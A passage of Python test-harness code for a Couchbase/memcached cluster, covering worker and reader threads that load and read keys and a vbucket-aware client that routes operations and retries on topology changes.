def run(self, scope=None, collection=None):
values = DocumentGenerator.make_docs(len(self.keys),
{"name": "user-${prefix}",
"payload": "memcached-json-${prefix}-${padding}",
"size": 1024, "seed": self.seed})
client = MemcachedClientHelper.proxy_client(self.serverInfo, self.name)
counter = 0
for value in values:
try:
if self.op == "set":
client.set(self.keys[counter], 0, 0, value, scope=scope, collection=collection)
self._mutated_count += 1
except MemcachedError:
self._rejected_count += 1
self._rejected_keys.append({"key": self.keys[counter], "value": value})
except Exception as e:
self.log.info("unable to mutate {0} due to {1}".format(self.keys[counter], e))
self._rejected_count += 1
self._rejected_keys.append({"key": self.keys[counter], "value": value})
client.close()
client = MemcachedClientHelper.proxy_client(self.serverInfo, self.name)
counter = counter + 1
self.log.info("mutation failed {0} times".format(self._rejected_count))
client.close()
def __init__(self, serverInfo,
keys,
op,
seed,
name='default',
scope=None,
collection=None):
threading.Thread.__init__(self)
self.log = logger.Logger.get_logger()
self.serverInfo = serverInfo
self.name = name
self.scope = scope,
self.collection = collection
self.keys = keys
self.op = op
self.seed = seed
self._mutated_count = 0
self._rejected_count = 0
self._rejected_keys = []
class ReaderThread(object):
def __init__(self, info, keyset, queue, scope=None, collection=None):
self.info = info
self.log = logger.Logger.get_logger()
self.error_seen = 0
self.keyset = keyset
self.aborted = False
self.queue = queue
self.scope = scope
self.collection = collection
def abort(self):
self.aborted = True
def _saw_error(self, key):
# error_msg = "unable to get key {0}"
self.error_seen += 1
# if self.error_seen < 500:
# self.log.error(error_msg.format(key))
def start(self):
client = MemcachedClientHelper.direct_client(self.info["server"], self.info['name'], admin_user='cbadminbucket',
admin_pass='password')
time.sleep(5)
while self.queue.empty() and self.keyset:
selected = MemcachedClientHelper.random_pick(self.keyset)
selected['how_many'] -= 1
if selected['how_many'] < 1:
self.keyset.remove(selected)
key = "{0}-{1}-{2}".format(self.info['baseuuid'],
selected['size'],
int(selected['how_many']))
try:
client.send_get(key, self.scope, self.collection)
except Exception:
self._saw_error(key)
# self.log.warning("attempted to get {0} keys before they are set".format(self.error_seen))
client.close()
# mutation ? let' do two cycles , first run and then try to mutate all those itesm
# and return
class WorkerThread(threading.Thread):
# too flags : stop after x errors
# slow down after every seeing y errors
# value_list is a list of document generators
def __init__(self,
serverInfo,
name,
values_list,
ignore_how_many_errors=5000,
override_vBucketId=-1,
terminate_in_minutes=120,
write_only=False,
moxi=True,
async_write=False,
delete_ratio=0,
expiry_ratio=0,
scope=None,
collection=None):
threading.Thread.__init__(self)
self.log = logger.Logger.get_logger()
self.serverInfo = serverInfo
self.name = name
self.scope = scope
self.collection = collection
self.values_list = []
self.values_list.extend(copy.deepcopy(values_list))
self._value_list_copy = []
self._value_list_copy.extend(copy.deepcopy(values_list))
self._inserted_keys_count = 0
self._rejected_keys = []
self._rejected_keys_count = 0
self._delete_ratio = delete_ratio
self._expiry_ratio = expiry_ratio
self._delete_count = 0
self._expiry_count = 0
self._delete = []
self.ignore_how_many_errors = ignore_how_many_errors
self.override_vBucketId = override_vBucketId
self.terminate_in_minutes = terminate_in_minutes
self._base_uuid = uuid.uuid4()
self.queue = Queue()
self.moxi = moxi
# let's create a read_thread
self.info = {'server': serverInfo,
'name': self.name,
'baseuuid': self._base_uuid,
'scope': self.scope,
'collection': self.collection}
self.write_only = write_only
self.aborted = False
self.async_write = async_write
def inserted_keys_count(self):
return self._inserted_keys_count
def rejected_keys_count(self):
return self._rejected_keys_count
# smart functin that gives you sth you can use to
# get inserted keys
# we should just expose an iterator instead which
# generates the key,values on fly
def keys_set(self):
# let's construct the inserted keys set
# TODO: hard limit , let's only populated up to 1 million keys
inserted_keys = []
for item in self._value_list_copy:
for i in range(0, (int(item['how_many']))):
key = "{0}-{1}-{2}".format(self._base_uuid, item['size'], i)
if key not in self._rejected_keys:
inserted_keys.append(key)
if len(inserted_keys) > 2 * 1024 * 1024:
break
return inserted_keys, self._rejected_keys
def run(self):
msg = "starting a thread to set keys mixed set-get ? {0} and using async_set ? {1}"
msg += " with moxi ? {2}"
msg = msg.format(self.write_only, self.async_write, self.moxi)
self.log.info(msg)
try:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
client = None
if self.moxi:
client = MemcachedClientHelper.proxy_client(self.serverInfo, self.name)
except Exception as ex:
self.log.info("unable to create memcached client due to {0}. stop thread...".format(ex))
import traceback
traceback.print_exc()
return
# keeping keys in the memory is not such a good idea because
# we run out of memory so best is to just keep a counter ?
# if someone asks for the keys we can give them the formula which is
# baseuuid-{0}-{1} , size and counter , which is between n-0 except those
# keys which were rejected
# let's print out some status every 5 minutes..
if not self.write_only:
self.reader = Process(target=start_reader_process, args=(self.info, self._value_list_copy, self.queue))
self.reader.start()
start_time = time.time()
last_reported = start_time
backoff_count = 0
while len(self.values_list) > 0 and not self.aborted:
selected = MemcachedClientHelper.random_pick(self.values_list)
selected['how_many'] -= 1
if selected['how_many'] < 1:
self.values_list.remove(selected)
if (time.time() - start_time) > self.terminate_in_minutes * 60:
self.log.info("its been more than {0} minutes loading data. stopping the process..".format(
self.terminate_in_minutes))
break
else:
# every two minutes print the status
if time.time() - last_reported > 2 * 60:
if not self.moxi:
awareness.done()
try:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
except Exception:
# vbucket map is changing . sleep 5 seconds
time.sleep(5)
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
self.log.info("now connected to {0} memcacheds".format(len(awareness.memcacheds)))
last_reported = time.time()
for item in self.values_list:
self.log.info(
'{0} keys (each {1} bytes) more to send...'.format(item['how_many'], item['size']))
key = "{0}-{1}-{2}".format(self._base_uuid,
selected['size'],
int(selected['how_many']))
if not self.moxi:
client = awareness.memcached(key)
if not client:
self.log.error("client should not be null")
value = "*"
try:
value = next(selected["value"])
except StopIteration:
pass
try:
if self.override_vBucketId >= 0:
client.vbucketId = self.override_vBucketId
if self.async_write:
client.send_set(key, 0, 0, value, self.scope, self.collection)
else:
client.set(key, 0, 0, value, self.scope, self.collection)
self._inserted_keys_count += 1
backoff_count = 0
# do expiry sets, 30 second expiry time
if Random().random() < self._expiry_ratio:
client.set(key + "-exp", 30, 0, value, self.scope, self.collection)
self._expiry_count += 1
# do deletes if we have 100 pending
# at the end delete the remaining
if len(self._delete) >= 100:
# self.log.info("deleting {0} keys".format(len(self._delete)))
for key_del in self._delete:
client.delete(key_del, self.scope, self.collection)
self._delete = []
# do delete sets
if Random().random() < self._delete_ratio:
client.set(key + "-del", 0, 0, value, self.scope, self.collection)
self._delete.append(key + "-del")
self._delete_count += 1
except MemcachedError as error:
if not self.moxi:
awareness.done()
try:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
except Exception:
# vbucket map is changing . sleep 5 seconds
time.sleep(5)
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
self.log.info("now connected to {0} memcacheds".format(len(awareness.memcacheds)))
if isinstance(self.serverInfo, dict):
self.log.error(
"memcached error {0} {1} from {2}".format(error.status, error.msg, self.serverInfo["ip"]))
else:
self.log.error(
"memcached error {0} {1} from {2}".format(error.status, error.msg, self.serverInfo.ip))
if error.status == 134:
backoff_count += 1
if backoff_count < 5:
backoff_seconds = 15 * backoff_count
else:
backoff_seconds = 2 * backoff_count
self.log.info("received error # 134. backing off for {0} sec".format(backoff_seconds))
time.sleep(backoff_seconds)
self._rejected_keys_count += 1
self._rejected_keys.append({"key": key, "value": value})
if len(self._rejected_keys) > self.ignore_how_many_errors:
break
except Exception as ex:
if not self.moxi:
awareness.done()
try:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
except Exception:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
self.log.info("now connected to {0} memcacheds".format(len(awareness.memcacheds)))
if isinstance(self.serverInfo, dict):
self.log.error("error {0} from {1}".format(ex, self.serverInfo["ip"]))
import traceback
traceback.print_exc()
else:
self.log.error("error {0} from {1}".format(ex, self.serverInfo.ip))
self._rejected_keys_count += 1
self._rejected_keys.append({"key": key, "value": value})
if len(self._rejected_keys) > self.ignore_how_many_errors:
break
# before closing the session let's try sending those items again
retry = 3
while retry > 0 and self._rejected_keys_count > 0:
rejected_after_retry = []
self._rejected_keys_count = 0
for item in self._rejected_keys:
try:
if self.override_vBucketId >= 0:
client.vbucketId = self.override_vBucketId
if self.async_write:
client.send_set(item["key"], 0, 0, item["value"], self.scope, self.collection)
else:
client.set(item["key"], 0, 0, item["value"], self.scope, self.collection)
self._inserted_keys_count += 1
except MemcachedError:
self._rejected_keys_count += 1
rejected_after_retry.append({"key": item["key"], "value": item["value"]})
if len(rejected_after_retry) > self.ignore_how_many_errors:
break
self._rejected_keys = rejected_after_retry
retry = -1
# clean up the rest of the deleted keys
if len(self._delete) > 0:
# self.log.info("deleting {0} keys".format(len(self._delete)))
for key_del in self._delete:
client.delete(key_del, self.scope, self.collection)
self._delete = []
self.log.info("deleted {0} keys".format(self._delete_count))
self.log.info("expiry {0} keys".format(self._expiry_count))
# client.close()
awareness.done()
if not self.write_only:
self.queue.put_nowait("stop")
self.reader.join()
def _initialize_memcached(self):
pass
def _set(self):
pass
def _handle_error(self):
pass
# if error is memcached error oom related let's do a sleep
def _time_to_stop(self):
return self.aborted or len(self._rejected_keys) > self.ignore_how_many_errors
class VBucketAwareMemcached(object):
def __init__(self, rest, bucket, info=None, scope=None, collection=None):
self.log = logger.Logger.get_logger()
self.info = info
self.bucket = bucket
if isinstance(bucket, Bucket):
self.bucket = bucket.name
self.memcacheds = {}
self.vBucketMap = {}
self.vBucketMapReplica = {}
self.rest = rest
self.reset(rest)
self.scope = scope
self.collections = collection
def reset(self, rest=None):
if not rest:
self.rest = RestConnection(self.info)
m, v, r = self.request_map(self.rest, self.bucket)
self.memcacheds = m
self.vBucketMap = v
self.vBucketMapReplica = r
def reset_vbuckets(self, rest, vbucketids_set, forward_map=None, admin_user='cbadminbucket', admin_pass='password'):
if not forward_map:
forward_map = rest.get_bucket(self.bucket, num_attempt=2).forward_map
if not forward_map:
self.reset(rest)
forward_map = rest.get_vbuckets(self.bucket)
nodes = rest.get_nodes()
for vBucket in forward_map:
if vBucket.id in vbucketids_set:
self.vBucketMap[vBucket.id] = vBucket.master
masterIp = vBucket.master.rsplit(":", 1)[0]
masterPort = int(vBucket.master.rsplit(":", 1)[1])
if self.vBucketMap[vBucket.id] not in self.memcacheds:
server = TestInputServer()
server.rest_username = rest.username
server.rest_password = rest.password
for node in nodes:
if node.ip == masterIp and node.memcached == masterPort:
server.port = node.port
server.ip = masterIp
self.log.info("Received forward map, reset vbucket map, new direct_client")
self.memcacheds[vBucket.master] = MemcachedClientHelper.direct_client(server, self.bucket,
admin_user=admin_user,
admin_pass=admin_pass)
# if no one is using that memcached connection anymore just close the connection
used_nodes = {self.vBucketMap[vb_name] for vb_name in self.vBucketMap}
rm_clients = []
for memcache_con in self.memcacheds:
if memcache_con not in used_nodes:
rm_clients.append(memcache_con)
for rm_cl in rm_clients:
self.memcacheds[rm_cl].close()
del self.memcacheds[rm_cl]
self.vBucketMapReplica[vBucket.id] = vBucket.replica
for replica in vBucket.replica:
self.add_memcached(replica, self.memcacheds, self.rest, self.bucket)
return True
def request_map(self, rest, bucket):
memcacheds = {}
vBucketMap = {}
vBucketMapReplica = {}
vb_ready = RestHelper(rest).vbucket_map_ready(bucket, 60)
if not vb_ready:
raise Exception("vbucket map is not ready for bucket {0}".format(bucket))
vBuckets = rest.get_vbuckets(bucket)
for vBucket in vBuckets:
vBucketMap[vBucket.id] = vBucket.master
self.add_memcached(vBucket.master, memcacheds, rest, bucket)
vBucketMapReplica[vBucket.id] = vBucket.replica
for replica in vBucket.replica:
self.add_memcached(replica, memcacheds, rest, bucket)
return memcacheds, vBucketMap, vBucketMapReplica
def add_memcached(self, server_str, memcacheds, rest, bucket, admin_user='cbadminbucket', admin_pass='password'):
if not server_str in memcacheds:
serverIp = server_str.rsplit(":", 1)[0]
serverPort = int(server_str.rsplit(":", 1)[1])
nodes = rest.get_nodes()
server = TestInputServer()
server.ip = serverIp
if TestInputSingleton.input.param("alt_addr", False):
server.ip = rest.get_ip_from_ini_file()
server.port = rest.port
server.rest_username = rest.username
server.rest_password = rest.password
try:
for node in nodes:
if node.ip == serverIp and node.memcached == serverPort:
if server_str not in memcacheds:
server.port = node.port
memcacheds[server_str] = \
MemcachedClientHelper.direct_client(server, bucket, admin_user=admin_user,
admin_pass=admin_pass)
# self.enable_collection(memcacheds[server_str])
break
except Exception as ex:
msg = "unable to establish connection to {0}. cleanup open connections"
self.log.warning(msg.format(serverIp))
self.done()
raise ex
def memcached(self, key, replica_index=None, scope=None, collection=None):
vBucketId = self._get_vBucket_id(key)
if replica_index is None:
return self.memcached_for_vbucket(vBucketId)
else:
return self.memcached_for_replica_vbucket(vBucketId, replica_index)
def memcached_for_vbucket(self, vBucketId):
if vBucketId not in self.vBucketMap:
msg = "vbucket map does not have an entry for vb : {0}"
raise Exception(msg.format(vBucketId))
if self.vBucketMap[vBucketId] not in self.memcacheds:
msg = "moxi does not have a mc connection for server : {0}"
raise Exception(msg.format(self.vBucketMap[vBucketId]))
return self.memcacheds[self.vBucketMap[vBucketId]]
def memcached_for_replica_vbucket(self, vBucketId, replica_index=0, log_on=False):
if vBucketId not in self.vBucketMapReplica:
msg = "replica vbucket map does not have an entry for vb : {0}"
raise Exception(msg.format(vBucketId))
if log_on:
self.log.info("replica vbucket: vBucketId {0}, server{1}".format(vBucketId,
self.vBucketMapReplica[vBucketId][
replica_index]))
if self.vBucketMapReplica[vBucketId][replica_index] not in self.memcacheds:
msg = "moxi does not have a mc connection for server : {0}"
raise Exception(msg.format(self.vBucketMapReplica[vBucketId][replica_index]))
return self.memcacheds[self.vBucketMapReplica[vBucketId][replica_index]]
def not_my_vbucket_memcached(self, key, scope=None, collection=None):
vBucketId = self._get_vBucket_id(key)
which_mc = self.vBucketMap[vBucketId]
for server in self.memcacheds:
if server != which_mc:
return self.memcacheds[server]
# DECORATOR
def aware_call(func):
def new_func(self, key, *args, **keyargs):
vb_error = 0
while True:
try:
return func(self, key, *args, **keyargs)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)},
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
return new_func
# SUBDOCS
@aware_call
def counter_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, scope=None, collection=None):
return self._send_op(self.memcached(key).counter_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas,
create=create, scope=scope, collection=collection)
@aware_call
def array_add_insert_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, scope=None, collection=None):
return self._send_op(self.memcached(key).array_add_insert_sd, key, path, value, expiry=expiry, opaque=opaque,
cas=cas, create=create, scope=scope, collection=collection)
@aware_call
def array_add_unique_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, scope=None, collection=None):
return self._send_op(self.memcached(key).array_add_unique_sd, key, path, value, expiry=expiry, opaque=opaque,
cas=cas, create=create, scope=scope, collection=collection)
@aware_call
def array_push_first_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, scope=None, collection=None):
return self._send_op(self.memcached(key).array_push_first_sd, key, path, value, expiry=expiry, opaque=opaque,
cas=cas, create=create, scope=scope, collection=collection)
@aware_call
def array_push_last_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, scope=None, collection=None):
return self._send_op(self.memcached(key).array_push_last_sd, key, path, value, expiry=expiry, opaque=opaque,
cas=cas, create=create, scope=scope, collection=collection)
@aware_call
def replace_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, scope=None, collection=None):
return self._send_op(self.memcached(key).replace_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas,
create=create, scope=scope, collection=collection)
@aware_call
def delete_sd(self, key, path, opaque=0, cas=0, scope=None, collection=None):
return self._send_op(self.memcached(key).delete_sd, key, path, opaque=opaque, cas=cas, scope=scope, collection=collection)
@aware_call
def dict_upsert_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, scope=None, collection=None):
return self._send_op(self.memcached(key).dict_upsert_sd, key, path, value, expiry=expiry, opaque=opaque,
cas=cas, create=create, scope=scope, collection=collection)
@aware_call
def dict_add_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, scope=None, collection=None):
return self._send_op(self.memcached(key).dict_add_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas,
create=create, scope=scope, collection=collection)
@aware_call
def exists_sd(self, key, path, cas=0, scope=None, collection=None):
return self._send_op(self.memcached(key).exists_sd, key, path, cas=cas, scope=scope, collection=collection)
@aware_call
def get_sd(self, key, path, cas=0, scope=None, collection=None):
return self._send_op(self.memcached(key).get_sd, key, path, cas=cas, scope=scope, collection=collection)
@aware_call
def set(self, key, exp, flags, value, scope=None, collection=None):
return self._send_op(self.memcached(key).set, key, exp, flags, value, scope=None, collection=collection)
@aware_call
def append(self, key, value, scope=None, collection=None):
return self._send_op(self.memcached(key).append, key, value, scope=scope, collection=collection)
@aware_call
def observe(self, key, scope=None, collection=None):
return self._send_op(self.memcached(key).observe, key, scope=scope, collection=collection)
@aware_call
def observe_seqno(self, key, vbucket_uuid, scope=None, collection=None):
return self._send_op(self.memcached(key).observe_seqno, key, vbucket_uuid, scope=scope, collection=collection)
# This saves a lot of repeated code - the func is the mc bin client function
def generic_request(self, func, *args):
key = args[0]
vb_error = 0
while True:
try:
return self._send_op(func, *args)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)},
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
if vb_error >= 5:
raise error
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
self.log.info("***************resetting vbucket id***********")
vb_error += 1
else:
raise error
def get(self, key, scope=None, collection=None):
vb_error = 0
while True:
try:
return self._send_op(self.memcached(key).get, key, scope=scope, collection=collection)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)},
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
def getr(self, key, replica_index=0, scope=None, collection=None):
vb_error = 0
while True:
try:
vBucketId = self._get_vBucket_id(key)
return self._send_op(self.memcached(key, replica_index=replica_index).getr, key, scope=scope, collection=collection)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)},
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
def setMulti(self, exp, flags, key_val_dic, pause_sec=1, timeout_sec=5, parallel=False, scope=None, collection=None):
if parallel:
try:
import concurrent.futures
self._setMulti_parallel(exp, flags, key_val_dic, pause_sec, timeout_sec, scope=scope, collection=collection)
except ImportError:
self._setMulti_seq(exp, flags, key_val_dic, pause_sec, timeout_sec, scope=scope, collection=collection)
else:
self._setMulti_seq(exp, flags, key_val_dic, pause_sec, timeout_sec, scope=scope, collection=collection)
def _setMulti_seq(self, exp, flags, key_val_dic, pause_sec=1, timeout_sec=5, scope=None, collection=None):
# set keys in their respective vbuckets and identify the server for each vBucketId
server_keyval = self._get_server_keyval_dic(key_val_dic)
# get memcached client against each server and multi set
for server_str, keyval in list(server_keyval.items()):
# if the server has been removed after server_keyval has been gotten
if server_str not in self.memcacheds:
self._setMulti_seq(exp, flags, key_val_dic, pause_sec, timeout_sec, scope=scope, collection=collection)
else:
mc = self.memcacheds[server_str]
errors = self._setMulti_rec(mc, exp, flags, keyval, pause_sec,
timeout_sec, self._setMulti_seq, scope=scope, collection=collection)
if errors:
self.log.error(list(set(str(error) for error in errors)), exc_info=1)
raise errors[0]
def _setMulti_parallel(self, exp, flags, key_val_dic, pause_sec=1, timeout_sec=5, scope=None, collection=None):
# set keys in their respective vbuckets and identify the server for each vBucketId
server_keyval = self._get_server_keyval_dic(key_val_dic)
# get memcached client against each server and multi set
tasks = []
import concurrent.futures
with concurrent.futures.ThreadPoolExecutor(max_workers=len(server_keyval)) as executor:
for server_str, keyval in list(server_keyval.items()):
mc = self.memcacheds[server_str]
tasks.append(
executor.submit(self._setMulti_rec, mc, exp, flags, keyval, pause_sec, timeout_sec,
self._setMulti_parallel, scope, collection))
errors = []
now = time.time()
for future in concurrent.futures.as_completed(tasks, timeout_sec):
if future.exception() is not None:
self.log.error("exception in {0} sec".format(time.time() - now))
raise future.exception()
errors.extend(future.result())
if errors:
self.log.error(list(set(str(error) for error in errors)), exc_info=1)
raise errors[0]
def enable_collection(self, memcached_client, bucket="default"):
memcached_client.bucket_select(bucket)
memcached_client.enable_collections()
memcached_client.hello(memcacheConstants.FEATURE_COLLECTIONS)
memcached_client.get_collections(True)
def _setMulti_rec(self, memcached_client, exp, flags, keyval, pause, timeout, rec_caller_fn,
scope=None, collection=None):
try:
if collection:
self.enable_collection(memcached_client)
errors = memcached_client.setMulti(exp, flags, keyval, scope=scope, collection=collection)
if not errors:
return []
elif timeout <= 0:
return errors
else:
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(list(keyval.keys())))
try:
rec_caller_fn(exp, flags, keyval, pause, timeout - pause,
scope=scope, collection=collection) # Start all over again for these key vals.
except MemcachedError as error:
if error.status == ERR_2BIG:
self.log.info("<MemcachedError #%d ``%s''>" % (error.status, error.msg))
return []
else:
return [error]
return [] # Note: If used for async,too many recursive threads could get spawn here.
except (EOFError, socket.error) as error:
try:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or \
"Connection reset by peer" in str(error) \
and timeout > 0:
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(list(keyval.keys())))
rec_caller_fn(exp, flags, keyval, pause, timeout - pause)
return []
else:
return [error]
except AttributeError:
# noinspection PyPackageRequirements
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or \
"Connection reset by peer" in str(error) \
and timeout > 0:
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(list(keyval.keys())))
rec_caller_fn(exp, flags, keyval, pause, timeout - pause)
return []
else:
return [error]
except BaseException as error:
if timeout <= 0:
return [error]
else:
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(list(keyval.keys())))
rec_caller_fn(exp, flags, keyval, pause, timeout - pause,
scope=scope, collection=collection) # Please refer above for comments.
return []
def _get_server_keyval_dic(self, key_val_dic):
server_keyval = {}
for key, val in list(key_val_dic.items()):
vBucketId = self._get_vBucket_id(key)
server_str = self.vBucketMap[vBucketId]
if server_str not in server_keyval:
server_keyval[server_str] = {}
server_keyval[server_str][key] = val
return server_keyval
def getMulti(self, keys_lst, pause_sec=1, timeout_sec=5, parallel=True, scope=None, collection=None):
if parallel:
try:
import concurrent.futures
return self._getMulti_parallel(keys_lst, pause_sec, timeout_sec, collection=collection)
except ImportError:
return self._getMulti_seq(keys_lst, pause_sec, timeout_sec, collection=collection)
else:
return self._getMulti_seq(keys_lst, pause_sec, timeout_sec, collection=collection)
def _getMulti_seq(self, keys_lst, pause_sec=1, timeout_sec=5, scope=None, collection=None):
server_keys = self._get_server_keys_dic(
keys_lst) # set keys in their respective vbuckets and identify the server for each vBucketId
keys_vals = {}
for server_str, keys in list(server_keys.items()): # get memcached client against each server and multi get
mc = self.memcacheds[server_str]
keys_vals.update(
self._getMulti_from_mc(mc, keys, pause_sec, timeout_sec, self._getMulti_seq,
scope=scope, collection=collection))
if len(keys_lst) != len(keys_vals):
raise ValueError("Not able to get values for following keys - {0}".format(
set(keys_lst).difference(list(keys_vals.keys()))))
return keys_vals
def _getMulti_parallel(self, keys_lst, pause_sec=1, timeout_sec=5, scope=None, collection=None):
server_keys = self._get_server_keys_dic(keys_lst)
tasks = []
import concurrent.futures
with concurrent.futures.ThreadPoolExecutor(max_workers=len(server_keys)) as executor:
for server_str, keys in list(server_keys.items()):
mc = self.memcacheds[server_str]
tasks.append(
executor.submit(self._getMulti_from_mc, mc, keys, pause_sec, timeout_sec, self._getMulti_parallel,
scope=scope, collection=collection))
keys_vals = self._reduce_getMulti_values(tasks, pause_sec, timeout_sec)
if len(set(keys_lst)) != len(keys_vals):
raise ValueError("Not able to get values for following keys - {0}".format(
set(keys_lst).difference(list(keys_vals[collection].keys()))))
return keys_vals
def _getMulti_from_mc(self, memcached_client, keys, pause, timeout, rec_caller_fn, scope=None, collection=None):
try:
if collection:
self.enable_collection(memcached_client)
return memcached_client.getMulti(keys, scope=scope, collection=collection)
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and timeout > 0:
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(keys))
return rec_caller_fn(keys, pause, timeout - pause, scope=scope, collection=collection)
else:
raise error
except BaseException as error:
if timeout <= 0:
raise error
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(keys))
return rec_caller_fn(keys, pause, timeout - pause)
def _reduce_getMulti_values(self, tasks, pause, timeout):
keys_vals = {}
import concurrent.futures
now = time.time()
for future in concurrent.futures.as_completed(tasks, timeout):
if future.exception() is not None:
self.log.error("exception in {0} sec".format(time.time() - now))
raise future.exception()
keys_vals.update(future.result())
return keys_vals
def _get_server_keys_dic(self, keys):
server_keys = {}
for key in keys:
vBucketId = self._get_vBucket_id(key)
server_str = self.vBucketMap[vBucketId]
if server_str not in server_keys:
server_keys[server_str] = []
server_keys[server_str].append(key)
return server_keys
def _get_vBucket_ids(self, keys, scope=None, collection=None):
return {self._get_vBucket_id(key) for key in keys}
def _get_vBucket_id(self, key, scope=None, collection=None):
return (zlib.crc32(key.encode()) >> 16) & (len(self.vBucketMap) - 1)
def delete(self, key, scope=None, collection=None):
vb_error = 0
while True:
try:
return self._send_op(self.memcached(key).delete, key, scope=scope, collection=collection)
except MemcachedError as error:
if error.status in [ERR_NOT_MY_VBUCKET, ERR_EINVAL] and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and vb_error < 5:
self.reset_vbuckets(self.rest, set([key], scope=scope, collection=collection))
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
def _send_op(self, func, *args, **kargs):
backoff = .001
while True:
try:
return func(*args, **kargs)
except MemcachedError as error:
if error.status == ERR_ETMPFAIL and backoff < .5:
time.sleep(backoff)
backoff *= 2
else:
raise error
except (EOFError, IOError, socket.error) as error:
raise MemcachedError(ERR_NOT_MY_VBUCKET, "Connection reset with error: {0}".format(error))
def done(self):
[self.memcacheds[ip].close() for ip in self.memcacheds]
# This saves a lot of repeated code - the func is the mc bin client function
def generic_request(self, func, *args):
key = args[0]
vb_error = 0
while True:
try:
return self._send_op(func, *args)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)},
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
if vb_error >= 5:
raise error
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
self.log.info("***************resetting vbucket id***********")
vb_error += 1
else:
raise error
def _parse_not_my_vbucket_error(self, error):
error_msg = error.msg
if "Connection reset with error:" in error_msg:
